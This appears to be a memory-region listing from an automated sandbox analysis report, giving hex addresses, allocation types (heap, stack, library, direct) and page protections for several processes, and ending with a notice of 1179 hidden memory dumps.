stack
page read and write
20085424000
trusted library allocation
page read and write
1F4320A2000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
7FFD9BB80000
trusted library allocation
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
7FFD9B9AB000
trusted library allocation
page read and write
7FFD9BD1F000
trusted library allocation
page read and write
C000120000
direct allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9BDC0000
trusted library allocation
page read and write
1DC8318C000
heap
page read and write
A1E6A7E000
stack
page read and write
7FFD9BD66000
trusted library allocation
page read and write
1F1E7FB0000
heap
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
1F4200EA000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
20085499000
trusted library allocation
page read and write
6F7417A000
stack
page read and write
2084917C000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page execute and read and write
7FFD9BD70000
trusted library allocation
page read and write
20083550000
heap
page read and write
1F420080000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
21FF8BE000
stack
page read and write
2008557D000
trusted library allocation
page read and write
A60000
unkown
page readonly
2009D583000
heap
page read and write
20848763000
trusted library allocation
page read and write
1F420125000
heap
page read and write
1F43A150000
heap
page execute and read and write
21FF73F000
stack
page read and write
53828BE000
stack
page read and write
4F9BFFF000
stack
page read and write
7FFD9BD4A000
trusted library allocation
page read and write
7FFD9BA76000
trusted library allocation
page execute and read and write
20848730000
heap
page execute and read and write
20085EAA000
trusted library allocation
page read and write
7FFD9BA36000
trusted library allocation
page read and write
1DCC085B000
heap
page read and write
7FFD9BCE4000
trusted library allocation
page read and write
63C50FE000
stack
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
7FFD9BA3C000
trusted library allocation
page execute and read and write
C000112000
direct allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
16681C60000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
20083668000
heap
page read and write
C00013A000
direct allocation
page read and write
1F1E9970000
heap
page read and write
200858C9000
trusted library allocation
page read and write
1DCB8701000
trusted library allocation
page read and write
C00000C000
direct allocation
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
20085885000
trusted library allocation
page read and write
C0000A2000
direct allocation
page read and write
1F422ABC000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page execute and read and write
7FFD9BB50000
trusted library allocation
page execute and read and write
7FFD9BA66000
trusted library allocation
page read and write
1DC9D149000
heap
page read and write
1DC85CFA000
trusted library allocation
page read and write
20848240000
trusted library allocation
page read and write
1F43A180000
heap
page read and write
20085832000
trusted library allocation
page read and write
7FFD9BD70000
trusted library allocation
page read and write
7FFD9BD60000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1F43A260000
heap
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
20860850000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
6F739B3000
stack
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
7FFD9BD1A000
trusted library allocation
page read and write
200835C0000
heap
page readonly
1F1E7FCE000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
4F9BDFE000
stack
page read and write
7FFD9BC70000
trusted library allocation
page read and write
7FFD9BC00000
trusted library allocation
page read and write
1F422B26000
trusted library allocation
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
7FFD9BCE4000
trusted library allocation
page read and write
1F422120000
trusted library allocation
page read and write
7FFD9BC20000
trusted library allocation
page read and write
A61000
unkown
page execute read
2009D5B0000
heap
page execute and read and write
7FFD9BB31000
trusted library allocation
page read and write
7FFD9BB92000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
C0000C2000
direct allocation
page read and write
1DCA8843000
trusted library allocation
page read and write
C000114000
direct allocation
page read and write
21FF37E000
stack
page read and write
1F422AC5000
trusted library allocation
page read and write
20083400000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
C00011E000
direct allocation
page read and write
200853A1000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
7FFD9BC40000
trusted library allocation
page read and write
7FFD9BD90000
trusted library allocation
page read and write
2009D4D1000
heap
page read and write
7FFD9BD1F000
trusted library allocation
page read and write
7FFD9BD5F000
trusted library allocation
page read and write
7FFD9BB62000
trusted library allocation
page read and write
1F1E9FFF000
heap
page read and write
20085428000
trusted library allocation
page read and write
208587B7000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9BDB0000
trusted library allocation
page read and write
7FFD9B9CB000
trusted library allocation
page read and write
1F4320B0000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
6F739FE000
stack
page read and write
63C51FB000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BD48000
trusted library allocation
page read and write
A1E6F3B000
stack
page read and write
C25D97E000
stack
page read and write
7FFD9BA66000
trusted library allocation
page execute and read and write
C000037000
direct allocation
page read and write
16681D25000
heap
page read and write
1F1E9FD4000
heap
page read and write
7FFD9BD85000
trusted library allocation
page read and write
7FFD9B76B000
trusted library allocation
page read and write
200854EC000
trusted library allocation
page read and write
20848220000
trusted library allocation
page read and write
1F1E7FB2000
heap
page read and write
4F9B3FD000
stack
page read and write
C06000
unkown
page write copy
7FFD9BCEA000
trusted library allocation
page read and write
1F1E7FFB000
heap
page read and write
1DCA68DE000
heap
page read and write
7FFD9BD36000
trusted library allocation
page read and write
1F1E9FFA000
heap
page read and write
20846940000
heap
page read and write
1DCA8701000
trusted library allocation
page read and write
7FFD9B99D000
trusted library allocation
page execute and read and write
C0000B2000
direct allocation
page read and write
7FFD9BC60000
trusted library allocation
page read and write
C0000DA000
direct allocation
page read and write
5382C3E000
stack
page read and write
7FFD9BC22000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
20848858000
trusted library allocation
page read and write
7FFD9B99B000
trusted library allocation
page read and write
C000146000
direct allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
208487CE000
trusted library allocation
page read and write
20085573000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
20085390000
heap
page execute and read and write
C00014C000
direct allocation
page read and write
B2A000
unkown
page readonly
1F181B75000
trusted library allocation
page read and write
20848280000
trusted library allocation
page read and write
2009D4B0000
heap
page read and write
7FFD9BD15000
trusted library allocation
page read and write
1DC94F8F000
trusted library allocation
page read and write
7FFD9BD34000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1DC8598E000
trusted library allocation
page read and write
16681B60000
heap
page read and write
1DC85005000
trusted library allocation
page read and write
1DCC085D000
heap
page read and write
1DCA9500000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page execute and read and write
20848CEC000
trusted library allocation
page read and write
7FFD9BAE3000
trusted library allocation
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
C000128000
direct allocation
page read and write
20860DE0000
heap
page read and write
C000126000
direct allocation
page read and write
1DCA69E0000
trusted library allocation
page read and write
1DCA9321000
trusted library allocation
page read and write
7FFD9B99B000
trusted library allocation
page read and write
200836CB000
heap
page read and write
1F4200A0000
heap
page read and write
C25E0BB000
stack
page read and write
1DC9D030000
heap
page execute and read and write
1DCC08CD000
heap
page read and write
7FFD9BD70000
trusted library allocation
page read and write
1DCA87F5000
trusted library allocation
page read and write
16681C80000
direct allocation
page read and write
7FFD9BB41000
trusted library allocation
page read and write
1F190010000
trusted library allocation
page read and write
1DCC0A25000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
1DCB878A000
trusted library allocation
page read and write
1F1EA420000
heap
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
C000156000
direct allocation
page read and write
208468D0000
heap
page read and write
1F1EA1DA000
heap
page read and write
1DCA8C27000
trusted library allocation
page read and write
C000004000
direct allocation
page read and write
1DCC089E000
heap
page read and write
2009D50B000
heap
page read and write
C0000AE000
direct allocation
page read and write
53829B9000
stack
page read and write
C79000
unkown
page readonly
7FFD9BB32000
trusted library allocation
page read and write
208491D3000
trusted library allocation
page read and write
1F4223AB000
trusted library allocation
page read and write
21FF47E000
stack
page read and write
7FFD9BB42000
trusted library allocation
page read and write
7FFD9BD14000
trusted library allocation
page read and write
2084884F000
trusted library allocation
page read and write
7FFD9BD33000
trusted library allocation
page read and write
C000062000
direct allocation
page read and write
1F43A076000
heap
page read and write
7FFD9BC50000
trusted library allocation
page read and write
20848276000
heap
page execute and read and write
1DC83178000
heap
page read and write
C03000
unkown
page write copy
7FFD9BD44000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
1DCA880D000
trusted library allocation
page read and write
20848AED000
trusted library allocation
page read and write
1F4200E4000
heap
page read and write
200834E0000
heap
page read and write
20085E28000
trusted library allocation
page read and write
7FFD9BD13000
trusted library allocation
page read and write
1F1E8235000
heap
page read and write
1DC83060000
heap
page read and write
1DCA6A70000
heap
page read and write
1F42216F000
trusted library allocation
page read and write
1F422AB8000
trusted library allocation
page read and write
7FFD9BDB0000
trusted library allocation
page read and write
2009D506000
heap
page read and write
7FFD9BAC6000
trusted library allocation
page read and write
1F4201F0000
heap
page read and write
7FFD9BDD0000
trusted library allocation
page read and write
1F42207F000
trusted library allocation
page read and write
7FFD9BC90000
trusted library allocation
page read and write
1F421B40000
heap
page read and write
1F422B2C000
trusted library allocation
page read and write
20848250000
heap
page readonly
C0000EC000
direct allocation
page read and write
2084697F000
heap
page read and write
C00008C000
direct allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
1F1E9F89000
heap
page read and write
7FFD9BD1A000
trusted library allocation
page read and write
C25D8FF000
stack
page read and write
A1E6D3E000
stack
page read and write
7FFD9BB72000
trusted library allocation
page read and write
7FFD9BC60000
trusted library allocation
page read and write
1DCA8220000
trusted library allocation
page read and write
7FFD9BD2A000
trusted library allocation
page read and write
2009D6A0000
heap
page execute and read and write
1DCA6A75000
heap
page read and write
7FFD9BD78000
trusted library allocation
page read and write
1F43A089000
heap
page read and write
C00011C000
direct allocation
page read and write
1DC83142000
heap
page read and write
7FFD9B992000
trusted library allocation
page read and write
20085E3A000
trusted library allocation
page read and write
20860B1C000
heap
page read and write
1F1E9DB0000
heap
page execute and read and write
C0000D2000
direct allocation
page read and write
1DCA880A000
trusted library allocation
page read and write
1DCA8725000
trusted library allocation
page read and write
C16000
unkown
page read and write
1DCA69A8000
heap
page read and write
7FFD9BD96000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
C000035000
direct allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
7FFD9BB06000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
7FFD9BD00000
trusted library allocation
page read and write
1DCC0A6C000
heap
page read and write
1DC8317A000
heap
page read and write
1F422010000
heap
page read and write
1F4200B2000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
7FFD9BD09000
trusted library allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
2008367F000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
538368E000
stack
page read and write
7FFD9BD1A000
trusted library allocation
page read and write
7FFD9BB4A000
trusted library allocation
page read and write
20860B0B000
heap
page read and write
7FFD9BB9E000
trusted library allocation
page read and write
1F422548000
trusted library allocation
page read and write
20085EA4000
trusted library allocation
page read and write
538267D000
stack
page read and write
7FFD9B90A000
trusted library allocation
page read and write
7FFD9BD66000
trusted library allocation
page read and write
200854AB000
trusted library allocation
page read and write
53826FE000
stack
page read and write
1DCA8749000
trusted library allocation
page read and write
7FFD9BC40000
trusted library allocation
page read and write
C0000CC000
direct allocation
page read and write
7FFD9BD13000
trusted library allocation
page read and write
7FFD9BD4A000
trusted library allocation
page read and write
1DCA83B0000
heap
page read and write
7FFD9BCF6000
trusted library allocation
page read and write
7FFD9BD6F000
trusted library allocation
page read and write
1F1E9FBB000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9BB61000
trusted library allocation
page read and write
C25DBFD000
stack
page read and write
20083624000
heap
page read and write
7FFD9BCD8000
trusted library allocation
page read and write
6F73FFE000
stack
page read and write
7FFD9BC60000
trusted library allocation
page read and write
1DCC0A85000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9B752000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
20848B26000
trusted library allocation
page read and write
7FFD9BA76000
trusted library allocation
page execute and read and write
7FFD9BAA0000
trusted library allocation
page execute and read and write
1F4219D0000
trusted library allocation
page read and write
C25DCBF000
stack
page read and write
208468F0000
heap
page read and write
A1E654D000
stack
page read and write
6F741F8000
stack
page read and write
A1E6BB6000
stack
page read and write
21FF5B7000
stack
page read and write
C0000D6000
direct allocation
page read and write
16681D4C000
heap
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
208587AA000
trusted library allocation
page read and write
7FFD9BD5A000
trusted library allocation
page read and write
C000154000
direct allocation
page read and write
5382CBB000
stack
page read and write
1DC85013000
trusted library allocation
page read and write
7FFD9BD30000
trusted library allocation
page read and write
7FFD9BDE0000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
1DC85061000
trusted library allocation
page read and write
20083520000
heap
page read and write
7FFD9BA6C000
trusted library allocation
page execute and read and write
1DCA8286000
heap
page execute and read and write
1DC85428000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
1DCA9192000
trusted library allocation
page read and write
C00003C000
direct allocation
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
7FFD9BCFB000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
20848270000
heap
page execute and read and write
7FFD9BB6A000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page execute and read and write
C000086000
direct allocation
page read and write
7FFD9BD30000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
C0000BC000
direct allocation
page read and write
BFF000
unkown
page read and write
1F4219E0000
heap
page readonly
7FFD9BD00000
trusted library allocation
page read and write
1F4219B0000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
20860B18000
heap
page read and write
63C4E78000
stack
page read and write
C19000
unkown
page read and write
C40000
unkown
page read and write
63C4C7E000
stack
page read and write
7FFD9BDC0000
trusted library allocation
page read and write
1F43A28C000
heap
page read and write
7FFD9B984000
trusted library allocation
page read and write
A61000
unkown
page execute read
1F43A530000
heap
page read and write
1F1E8230000
heap
page read and write
1F4201F5000
heap
page read and write
C6E000
unkown
page read and write
53825FE000
stack
page read and write
1F1E98D3000
trusted library allocation
page read and write
A1E68FD000
stack
page read and write
7FFD9BDC0000
trusted library allocation
page read and write
208469A2000
heap
page read and write
7FFD9B7AC000
trusted library allocation
page execute and read and write
63C4D7D000
stack
page read and write
200853B8000
trusted library allocation
page read and write
208468F5000
heap
page read and write
7FFD9B994000
trusted library allocation
page read and write
C46000
unkown
page read and write
1F181C3F000
trusted library allocation
page read and write
20085B64000
trusted library allocation
page read and write
7FFD9BB36000
trusted library allocation
page read and write
1F1EA130000
heap
page read and write
7FFD9BD16000
trusted library allocation
page read and write
20860903000
heap
page read and write
A1E687E000
stack
page read and write
1DC8500D000
trusted library allocation
page read and write
200835E8000
heap
page read and write
20848CEA000
trusted library allocation
page read and write
6F743FE000
stack
page read and write
1DC9D2E3000
heap
page read and write
1DCA68FB000
heap
page read and write
7FFD9B9B4000
trusted library allocation
page read and write
166A7881000
direct allocation
page read and write
7FFD9BA36000
trusted library allocation
page read and write
7FFD9BD0A000
trusted library allocation
page read and write
7FFD9BD50000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
1DCA9147000
trusted library allocation
page read and write
20848BF3000
trusted library allocation
page read and write
C00005F000
direct allocation
page read and write
1DCA6949000
heap
page read and write
B2A000
unkown
page readonly
1DC9D0E0000
heap
page read and write
7FFD9BD38000
trusted library allocation
page read and write
C000082000
direct allocation
page read and write
1F1EA050000
heap
page read and write
7FFD9BD68000
trusted library allocation
page read and write
7FFD9BD23000
trusted library allocation
page read and write
20083665000
heap
page read and write
2009D6D0000
heap
page read and write
7FFD9BCF4000
trusted library allocation
page read and write
7FFD9BD65000
trusted library allocation
page read and write
2009542A000
trusted library allocation
page read and write
7FFD9B9B3000
trusted library allocation
page execute and read and write
1F41FF80000
heap
page read and write
7FFD9BD20000
trusted library allocation
page read and write
7FFD9BA66000
trusted library allocation
page execute and read and write
C000116000
direct allocation
page read and write
63C4B7E000
stack
page read and write
200853E7000
trusted library allocation
page read and write
7FFD9BD8E000
trusted library allocation
page read and write
208482B0000
heap
page read and write
20085E43000
trusted library allocation
page read and write
1DCA94FA000
trusted library allocation
page read and write
7FFD9BDA0000
trusted library allocation
page read and write
20083500000
heap
page read and write
C0000A6000
direct allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
C00010C000
direct allocation
page read and write
7FFD9BA3C000
trusted library allocation
page execute and read and write
7FFD9BC90000
trusted library allocation
page read and write
C25DEBF000
stack
page read and write
1F42203D000
trusted library allocation
page read and write
63C4AFF000
stack
page read and write
C000118000
direct allocation
page read and write
21FF53E000
stack
page read and write
208487D0000
trusted library allocation
page read and write
7FFD9BDB0000
trusted library allocation
page read and write
1F1EA17F000
heap
page read and write
1DCA8864000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
C0000D8000
direct allocation
page read and write
1DCA918C000
trusted library allocation
page read and write
63C47EE000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
7FFD9BCDB000
trusted library allocation
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
1F42211D000
trusted library allocation
page read and write
1DCA6946000
heap
page read and write
21FF639000
stack
page read and write
1DCA691B000
heap
page read and write
1F4220A6000
trusted library allocation
page read and write
C000064000
direct allocation
page read and write
1DCA8BB3000
trusted library allocation
page read and write
53827FD000
stack
page read and write
208587C5000
trusted library allocation
page read and write
C000006000
direct allocation
page read and write
20860B22000
heap
page read and write
1DC859CE000
trusted library allocation
page read and write
5382A3F000
stack
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
2084883D000
trusted library allocation
page read and write
21FF7B8000
stack
page read and write
2086094B000
heap
page read and write
1DC831B4000
heap
page read and write
6F73CFF000
stack
page read and write
208608AA000
heap
page read and write
63C507E000
stack
page read and write
1F420127000
heap
page read and write
21FF4F9000
stack
page read and write
20083663000
heap
page read and write
20848741000
trusted library allocation
page read and write
208609C0000
heap
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
C0000A0000
direct allocation
page read and write
7FFD9BDD0000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
C000020000
direct allocation
page read and write
1F422021000
trusted library allocation
page read and write
1F1E7F10000
heap
page read and write
538370D000
stack
page read and write
7FFD9BD3F000
trusted library allocation
page read and write
20085581000
trusted library allocation
page read and write
21FF2FD000
stack
page read and write
7FFD9BD0F000
trusted library allocation
page read and write
2008362A000
heap
page read and write
1F42205E000
trusted library allocation
page read and write
1DC84F01000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
C73000
unkown
page write copy
C000030000
direct allocation
page read and write
2009D7BC000
heap
page read and write
C25DFBE000
stack
page read and write
7FFD9BCF9000
trusted library allocation
page read and write
C0000C6000
direct allocation
page read and write
7FFD9BD6F000
trusted library allocation
page read and write
1F421B4A000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1DC84F86000
trusted library allocation
page read and write
1DCC0A55000
heap
page read and write
C000045000
direct allocation
page read and write
7FFD9BD76000
trusted library allocation
page read and write
1DCA6901000
heap
page read and write
7FFD9BD44000
trusted library allocation
page read and write
20848C66000
trusted library allocation
page read and write
1DC8500B000
trusted library allocation
page read and write
1DCA8310000
heap
page execute and read and write
C000094000
direct allocation
page read and write
C00003A000
direct allocation
page read and write
2009541C000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
1F432094000
trusted library allocation
page read and write
1DCC0810000
heap
page read and write
7FFD9B754000
trusted library allocation
page read and write
1F421B45000
heap
page read and write
20085806000
trusted library allocation
page read and write
7FFD9BCDB000
trusted library allocation
page read and write
7FFD9BCF2000
trusted library allocation
page read and write
C25DD37000
stack
page read and write
1DC9D129000
heap
page read and write
1F1E7F8E000
heap
page read and write
1DC84F5F000
trusted library allocation
page read and write
7FFD9BB2F000
trusted library allocation
page read and write
7FFD9BCD8000
trusted library allocation
page read and write
21FF83E000
stack
page read and write
1DC84A60000
trusted library allocation
page read and write
63C517E000
stack
page read and write
1F1E7FAE000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
C73000
unkown
page write copy
1F181C3B000
trusted library allocation
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
208491C4000
trusted library allocation
page read and write
7FFD9BD00000
trusted library allocation
page read and write
7FFD9BB3A000
trusted library allocation
page read and write
200853EA000
trusted library allocation
page read and write
1DCA878A000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
7FFD9BADA000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
7FFD9B9DC000
trusted library allocation
page execute and read and write
7FFD9BA70000
trusted library allocation
page read and write
20848CE8000
trusted library allocation
page read and write
C0000D0000
direct allocation
page read and write
7FFD9BD63000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
1F422126000
trusted library allocation
page read and write
7FFD9BD2A000
trusted library allocation
page read and write
7FFD9B9AB000
trusted library allocation
page read and write
1F1EA160000
heap
page read and write
1DCA8300000
heap
page execute and read and write
1DCA8280000
heap
page execute and read and write
1F4200DE000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page execute and read and write
7FFD9BD0A000
trusted library allocation
page read and write
1F1901B8000
trusted library allocation
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
1F43A020000
heap
page read and write
7FFD9BCE6000
trusted library allocation
page read and write
2008361C000
heap
page read and write
1F43A120000
heap
page execute and read and write
1F432031000
trusted library allocation
page read and write
20860B24000
heap
page read and write
2086085C000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
63C47A2000
stack
page read and write
1DC83080000
heap
page read and write
200854F4000
trusted library allocation
page read and write
7FFD9BD05000
trusted library allocation
page read and write
7FFD9BD38000
trusted library allocation
page read and write
2009D52C000
heap
page read and write
2009D4C3000
heap
page read and write
7FFD9B806000
trusted library allocation
page read and write
1DCA69F0000
heap
page readonly
6F73C7E000
stack
page read and write
7FFD9BC80000
trusted library allocation
page read and write
20083590000
trusted library allocation
page read and write
1F180089000
trusted library allocation
page read and write
1F1E7F70000
heap
page read and write
1F4200DC000
heap
page read and write
538277E000
stack
page read and write
1DCA8804000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page execute and read and write
1DC84A70000
heap
page read and write
20085DD8000
trusted library allocation
page read and write
7FFD9BCF4000
trusted library allocation
page read and write
C0000A4000
direct allocation
page read and write
2009D4E0000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
1DC84A85000
heap
page read and write
C000100000
direct allocation
page read and write
1DCA9145000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page execute and read and write
7FFD9BB70000
trusted library allocation
page read and write
7FFD9BB52000
trusted library allocation
page read and write
7FFD9BD00000
trusted library allocation
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
20085E2B000
trusted library allocation
page read and write
6F73D7E000
stack
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
C000098000
direct allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
1F1E9FDF000
heap
page read and write
20083606000
heap
page read and write
6F7427E000
stack
page read and write
C00004E000
direct allocation
page read and write
2009D819000
heap
page read and write
1F43A2B3000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
5382B3B000
stack
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
2008363C000
heap
page read and write
21FF6BF000
stack
page read and write
21FF97E000
stack
page read and write
20846900000
heap
page read and write
C25EB0D000
stack
page read and write
1DC85ABE000
trusted library allocation
page read and write
1DC9D080000
heap
page execute and read and write
7FFD9BD1C000
trusted library allocation
page read and write
1F43A07E000
heap
page read and write
7FFD9BC20000
trusted library allocation
page read and write
1DC94F83000
trusted library allocation
page read and write
1DCA6880000
heap
page read and write
7FFD9BA96000
trusted library allocation
page execute and read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9BD23000
trusted library allocation
page read and write
7FFD9BBC3000
trusted library allocation
page read and write
1F422069000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
7FFD9B98D000
trusted library allocation
page execute and read and write
208469E8000
heap
page read and write
1F1EA19A000
heap
page read and write
1DC85001000
trusted library allocation
page read and write
200854A7000
trusted library allocation
page read and write
1F4201FE000
heap
page read and write
7FFD9BD55000
trusted library allocation
page read and write
C00012E000
direct allocation
page read and write
1F1E7FB8000
heap
page read and write
2084888E000
trusted library allocation
page read and write
1F1E9F10000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
C000066000
direct allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
There are 1179 hidden memdumps, click here to show them.